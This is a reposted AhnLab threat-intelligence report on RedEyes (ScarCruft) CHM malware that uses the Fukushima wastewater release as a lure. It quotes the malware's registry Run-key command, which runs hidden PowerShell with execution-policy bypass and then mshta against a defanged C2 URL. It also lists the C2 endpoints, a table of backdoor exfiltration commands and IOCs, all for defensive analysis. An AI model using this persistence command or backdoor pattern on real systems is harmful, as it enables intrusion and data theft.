RedEyes (ScarCruft)’s CHM Malware Using the Topic of Fukushima Wastewater Release

by Prapattimynk, Saturday, 16 September 2023 (5 months ago)
RedEyes (ScarCruft)’s CHM Malware Using the Topic of Fukushima Wastewater Release


The AhnLab Security Emergency response Center (ASEC) analysis team has recently discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company”[1] covered in March of this year and also uses the same commands used in the “2.3. Persistence”[2] stage in the attack process of the RedEyes group’s M2RAT malware’.

The recent attack used information regarding the release of Fukushima wastewater. By using such a spotlight issue in Korea, the threat actor provokes the user’s curiosity and leads them to open the malicious file. Information about this issue can be seen in the help file window generated when the CHM malware is executed, as shown in Figure 1.

Figure 1. CHM malware containing information regarding the Fukushima wastewater release

Figure 2 shows the malicious script that operates during this process. The mshta command used to be executed directly by the CHM file (hh.exe), but the recently distributed file registers the command to the RUN key enabling it to be run when the system reboots.

Figure 2. Malicious script within the CHM
  • RUN key registration
    Registry path: HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun
    Value name: fGZtm
    Value: c:windowssystem32cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html

When the command registered to the RUN key is executed, an additional script at a certain URL runs through mshta. The said URL contains a JavaScript (JS) code. This code is responsible for executing an encoded PowerShell command. This process is similar in structure to the commands used in the attack process of previously covered CHM malware and M2RAT malware.

Figure 3. 4.html code

The decoded PowerShell command is a backdoor responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results. It receives commands from the threat actor’s server, and according to the commands, can perform various malicious behaviors such as uploading/downloading files, transmitting information on specific files, and editing the registry.

  • C2
    • hxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[Computer name]-[User name] // Receive the threat actor’s command
    • hxxp://navercorp[.]ru/dashboard/image/202302/com.php?R=[BASE64 encoding] // Transmit the command execution results
Figure 4. Decoded PowerShell command
Figure 5. Receiving commands
CommandFeature
fileinfoSaves the list of files and their properties (name, size, last modified time) in a certain path as CSV, transmits this file to the C2 server, then deletes it from the local system
dirCompresses folders in a certain path, transmits them to the C2 server, then deletes them from the local system
fileSends (uploads) a certain file to the C2 server
downDownloads files in a certain path
regeditEdits the registry
taskAdds a task to the Task Scheduler to be repetitively run at 10-minute intervals
zipDecompresses a compressed file in a certain path
renameChanges the name of a certain file
delDelete files in a certain path
Table 1. List of commands received

When a system is infected with this type of malware, the system can suffer great damage since this malware is capable of performing various malicious acts such as downloading additional files and breaching data according to the threat actor’s commands. In particular, malware that targets users in Korea may include information on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.

[File Detection]
Downloader/CHM.Generic (2023.09.02.00)

[IOC]
52f71fadf0ea5ffacd753e83a3d0af1a
hxxp://navercorp[.]ru/dashboard/image/202302/4.html
hxxp://navercorp[.]ru/dashboard/image/202302/com.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Comments

Your email address will not be published. Required fields are marked *

Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.